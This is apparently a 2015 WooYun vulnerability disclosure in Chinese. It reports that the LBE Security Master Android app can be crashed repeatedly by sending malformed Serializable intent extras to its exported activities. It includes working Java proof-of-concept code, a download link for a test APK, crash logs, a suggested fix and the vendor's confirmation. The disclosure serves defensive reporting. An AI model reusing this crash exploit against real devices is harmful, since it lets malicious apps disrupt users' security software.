当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105985

漏洞标题:无视主动防御利用多处缺陷使得LBE安全崩溃退出

相关厂商:lbesec.com

漏洞作者: Nicky

提交时间:2015-04-05 15:22

修复时间:2015-07-07 15:52

公开时间:2015-07-07 15:52

漏洞类型:设计错误/逻辑缺陷

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-05: 细节已通知厂商并且等待厂商处理中
2015-04-08: 厂商已经确认,细节仅向厂商公开
2015-04-11: 细节向第三方安全合作伙伴开放
2015-06-02: 细节向核心白帽子及相关领域专家公开
2015-06-12: 细节向普通白帽子公开
2015-06-22: 细节向实习白帽子公开
2015-07-07: 细节向公众公开

简要描述:

LBE安全大师存在多处缺陷可被恶意应用终止防护

详细说明:

作为一款安全应用自身安全性还是很重要的,经测试,LBE安卓最新版存在多处本地服务,在开启主动防御的情况可使得LBE安全大师无限崩溃;(测试时看到LBE有多个进程,在崩溃后一段时间会自动重启,但其实只要写个循环就行了,崩溃比重启快多了~~)
因为是漏洞,所以根本不需要关注啥主动防御,存在问题的组件有:
com.lbe.security.ui.phone2.PhoneMainActivity
com.lbe.security.ui.notificationmanager.NotificationManagerActivity
com.lbe.security.ui.tips.TipsWebActivity
com.lbe.security.ui.privacy.HipsMainActivity
com.lbe.security.ui.home.NewHomeActivity
com.lbe.security.ui.market.category.CategoryDetailsListActivity
com.lbe.security.ui.upgrade.UpdateManagerActivity
com.lbe.security.ui.optimize.WakePathActivity
利用代码:MainActivity.java

package com.example.myapp;
import android.app.Activity;
import android.os.Bundle;
import android.content.Intent;
import android.content.ComponentName;
import java.io.Serializable;
public class MyActivity extends Activity {
/**
* Called when the activity is first created.
*/
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
int n=20;
while (n>0){
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.lbe.security", "com.lbe.security.ui.optimize.WakePathActivity"));
intent.putExtra("this_is_a_random_serializable_extra_for_test_general_reject_server", new SerializableObject());
startActivity(intent);
n--;
}
}
static class SerializableObject implements Serializable {
static final long serialVersionUID = 42L;
SerializableObject() {
super();
}
}
}


提供一个验证用的APK,安装后打开,LBE自动崩溃多次:
链接: http://pan.baidu.com/s/1bHVeI 密码: gam5

漏洞证明:

相关crash的logcat:

java.lang.RuntimeException: Unable to start activity 
ComponentInfo{com.lbe.security/com.lbe.security.ui.op
timize.WakePathActivity}: java.lang.RuntimeException:
Parcelable encounteredClassNotFoundException reading
a Serializable object (name = com.example.myapp.MyAc
tivity$SerializableObject)
W at android.app.ActivityThread.performLaunchActivi
ty(ActivityThread.java:2371)
W at android.app.ActivityThread.handleLaunchActivit
y(ActivityThread.java:2423)
W at android.app.ActivityThread.access$800(Activity
Thread.java:155)
W at android.app.ActivityThread$H.handleMessage(Act
ivityThread.java:1340)
W at android.os.Handler.dispatchMessage(Handler.jav
a:110)
W at android.os.Looper.loop(Looper.java:193)
W at android.app.ActivityThread.main(ActivityThread
.java:5332)
W at java.lang.reflect.Method.invokeNative(Native M
ethod)
W at java.lang.reflect.Method.invoke(Method.java:51
5)
W at com.android.internal.os.ZygoteInit$MethodAndAr
gsCaller.run(ZygoteInit.java:829)
W at com.android.internal.os.ZygoteInit.main(Zygote
Init.java:645)
W at dalvik.system.NativeStart.main(Native Method)
W Caused by: java.lang.RuntimeException: Parcelable enc
ounteredClassNotFoundException reading a Serializable
object (name = com.example.myapp.MyActivity$Serializ
ableObject)
W at android.os.Parcel.readSerializable(Parcel.java
:2219)
W at android.os.Parcel.readValue(Parcel.java:2064)
W at android.os.Parcel.readArrayMapInternal(Parcel.
java:2314)
W at android.os.Bundle.unparcel(Bundle.java:249)
W at android.os.Bundle.getString(Bundle.java:1118)
W at android.content.Intent.getStringExtra(Intent.j
ava:4961)
W at com.lbe.security.ui.optimize.WakePathActivity.
onCreate(WakePathActivity.java:86)
W at android.app.Activity.performCreate(Activity.ja
va:5371)
W at android.app.Instrumentation.callActivityOnCrea
te(Instrumentation.java:1106)
W at com.lbe.client.zz.ba.callActivityOnCreate(Inst
rumentationDelegate.java:76)
W at android.app.ActivityThread.performLaunchActivi
ty(ActivityThread.java:2335)
W ... 11 more
W Caused by: java.lang.ClassNotFoundException: com.exam
ple.myapp.MyActivity$SerializableObject
W at java.lang.Class.classForName(Native Method)
W at java.lang.Class.forName(Class.java:251)
W at java.io.ObjectInputStream.resolveClass(ObjectI
nputStream.java:2266)
W at java.io.ObjectInputStream.readNewClassDesc(Obj
ectInputStream.java:1644)
W at java.io.ObjectInputStream.readClassDesc(Object
InputStream.java:658)
W at java.io.ObjectInputStream.readNewObject(Object
InputStream.java:1785)
W at java.io.ObjectInputStream.readNonPrimitiveCont
ent(ObjectInputStream.java:762)
W at java.io.ObjectInputStream.readObject(ObjectInp
utStream.java:1986)
W at java.io.ObjectInputStream.readObject(ObjectInp
utStream.java:1943)
W at android.os.Parcel.readSerializable(Parcel.java
:2213)
W ... 21 more
W Caused by: java.lang.NoClassDefFoundError: com/exampl
e/myapp/MyActivity$SerializableObject
W ... 31 more
W Caused by: java.lang.ClassNotFoundException: Didn't f
ind class "com.example.myapp.MyActivity$SerializableO
bject" on path: DexPathList[[zip file "/data/app/com.
lbe.security-1.apk"],nativeLibraryDirectories=[/data/
app-lib/com.lbe.security-1, /vendor/lib, /system/lib]
]
W at dalvik.system.BaseDexClassLoader.findClass(Bas
eDexClassLoader.java:56)
W at java.lang.ClassLoader.loadClass(ClassLoader.ja
va:497)
W at java.lang.ClassLoader.loadClass(ClassLoader.ja
va:457)
W ... 31 more
dalvikvm W threadid=1: calling UncaughtExceptionHandler
I +++ calling Ljava/lang/ThreadGroup;.uncaughtException
AndroidRuntime E FATAL EXCEPTION: main
E Process: com.lbe.security, PID: 7455
E java.lang.RuntimeException: Unable to start activity
ComponentInfo{com.lbe.security/com.lbe.security.ui.op
timize.WakePathActivity}: java.lang.RuntimeException:
Parcelable encounteredClassNotFoundException reading
a Serializable object (name = com.example.myapp.MyAc
tivity$SerializableObject)
E at android.app.ActivityThread.performLaunchActivi
ty(ActivityThread.java:2371)
E at android.app.ActivityThread.handleLaunchActivit
y(ActivityThread.java:2423)
E at android.app.ActivityThread.access$800(Activity
Thread.java:155)
E at android.app.ActivityThread$H.handleMessage(Act
ivityThread.java:1340)
E at android.os.Handler.dispatchMessage(Handler.jav
a:110)
E at android.os.Looper.loop(Looper.java:193)
E at android.app.ActivityThread.main(ActivityThread
.java:5332)
E at java.lang.reflect.Method.invokeNative(Native M
ethod)
E at java.lang.reflect.Method.invoke(Method.java:51
5)
E at com.android.internal.os.ZygoteInit$MethodAndAr
gsCaller.run(ZygoteInit.java:829)
E at com.android.internal.os.ZygoteInit.main(Zygote
Init.java:645)
E at dalvik.system.NativeStart.main(Native Method)
E Caused by: java.lang.RuntimeException: Parcelable enc
ounteredClassNotFoundException reading a Serializable
object (name = com.example.myapp.MyActivity$Serializ
ableObject)
E at android.os.Parcel.readSerializable(Parcel.java
:2219)
E at android.os.Parcel.readValue(Parcel.java:2064)
E at android.os.Parcel.readArrayMapInternal(Parcel.
java:2314)
E at android.os.Bundle.unparcel(Bundle.java:249)
E at android.os.Bundle.getString(Bundle.java:1118)
E at android.content.Intent.getStringExtra(Intent.j
ava:4961)
E at com.lbe.security.ui.optimize.WakePathActivity.
onCreate(WakePathActivity.java:86)
E at android.app.Activity.performCreate(Activity.ja
va:5371)
E at android.app.Instrumentation.callActivityOnCrea
te(Instrumentation.java:1106)
E at com.lbe.client.zz.ba.callActivityOnCreate(Inst
rumentationDelegate.java:76)
E at android.app.ActivityThread.performLaunchActivi
ty(ActivityThread.java:2335)
E ... 11 more
E Caused by: java.lang.ClassNotFoundException: com.exam
ple.myapp.MyActivity$SerializableObject
E at java.lang.Class.classForName(Native Method)
E at java.lang.Class.forName(Class.java:251)
E at java.io.ObjectInputStream.resolveClass(ObjectI
nputStream.java:2266)
E at java.io.ObjectInputStream.readNewClassDesc(Obj
ectInputStream.java:1644)
E at java.io.ObjectInputStream.readClassDesc(Object
InputStream.java:658)
E at java.io.ObjectInputStream.readNewObject(Object
InputStream.java:1785)
E at java.io.ObjectInputStream.readNonPrimitiveCont
ent(ObjectInputStream.java:762)
E at java.io.ObjectInputStream.readObject(ObjectInp
utStream.java:1986)
E at java.io.ObjectInputStream.readObject(ObjectInp
utStream.java:1943)
E at android.os.Parcel.readSerializable(Parcel.java
:2213)
E ... 21 more
E Caused by: java.lang.NoClassDefFoundError: com/exampl
e/myapp/MyActivity$SerializableObject
E ... 31 more
E Caused by: java.lang.ClassNotFoundException: Didn't f
ind class "com.example.myapp.MyActivity$SerializableO
bject" on path: DexPathList[[zip file "/data/app/com.
lbe.security-1.apk"],nativeLibraryDirectories=[/data/
app-lib/com.lbe.security-1, /vendor/lib, /system/lib]
]
E at dalvik.system.BaseDexClassLoader.findClass(Bas
eDexClassLoader.java:56)
E at java.lang.ClassLoader.loadClass(ClassLoader.ja
va:497)
E at java.lang.ClassLoader.loadClass(ClassLoader.ja
va:457)
E ... 31 more
dalvikvm D threadid=10: exiting
D threadid=10: bye!
Process I Sending signal. PID: 7455 SIG: 9
Process 7455 ended


S50405-115137.jpg

S50405-115207.jpg

修复方案:

严格校验接受数据的输入,如空指针,畸形数据,强制数据类型转换等异常情况的判断。

版权声明:转载请注明来源 Nicky@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-08 15:51

厂商回复:

感谢Nicky的研究和提交。LBE安全大师目前是双进程,主动防御的服务和UI不在一个进程,Nicky的方法的确可以导致LBE的UI进程崩溃,但这个时候主动防御并没有失效,依然在正常保护用户。但这样的设计缺陷的确不应该出现在一个安全产品中,对此我们非常抱歉,会在下一版本中立刻完善。再次感谢Nicky的辛勤工作!

最新状态:

暂无